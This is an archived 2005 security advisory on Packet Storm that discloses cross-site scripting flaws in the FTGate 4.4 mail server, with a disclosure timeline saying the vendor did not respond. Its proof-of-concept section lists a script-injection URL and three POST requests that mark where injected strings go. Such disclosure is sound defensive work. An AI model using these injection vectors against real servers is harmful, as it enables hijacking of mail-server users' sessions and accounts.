exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ACSSEC-2005-11-25-3.txt

ACSSEC-2005-11-25-3.txt
Posted Dec 28, 2005
Authored by Tim Shelton

FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially crafted XSS requests. A remote attacker could trick a user into viewing a vulnerable page which could then lead to remote compromise.

tags | exploit, remote
SHA-256 | 33dfe89225193d68e6d1206225306097c653ed2c3a7fbe883ede8191c580112c

ACSSEC-2005-11-25-3.txt

Change Mirror Download

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - XSS Scripting Vulnerability

ID: ACSSEC-2005-11-25 - 0x3

Class: Cross-Site-Scripting (XSS)
Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005]
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 20, 2005

Remote: Yes
Severity: Low

Credit: Tim Shelton <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

FTGate4 is a powerful Windows(TM) communication suite that combines
exceptional mail handling facilities with comprehensive Groupware
functionality. Its security and collaboration features were developed
in conjunction with leading ISP's and define a new era in mail server
performance.


-=[ Technical Description

FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially
crafted XSS requests. A remote attacker could trick a user into
viewing a vulnerable page which could then lead to remote compromise.


-=[ Proof of Concepts

http://127.0.0.1:8089/index.fts?href="><script>alert('XSS-magic-string');</s
cript>

POST /domains/index.fts
href=%2Fdomains%2Findex.fts&config=1003&command=0&start=0&param1=Domain+List
%2C%2Fdomains%2Findex.fts[STRING INJECTION
HERE]&param2=&find=*&elements=10&aliases=1&data0=19

POST /config/licence.fts
href=%2Fconfig%2Flicence.fts&config=1003&command=0&param1=Routing%2C%2Ffilte
rs%2Froutes.fts[STRING INJECTION HERE]&param2=&reg=

POST /config/systemacl.fts
href=%2Fconfig%2Fsystemacl.fts&config=1003&command=0&id=0&param1=System+Time
rs%2C%2Fschedules%2Findex.fts[STRING INJECTION
HERE]&redirect=&data1=32&address=

-=[ Solution
No remedy available as of December 2005.

-=[ Credits

Vulnerability originally reported by Tim Shelton


-=[ ChangeLog

2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : No response from vendor, disclosing full information.
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close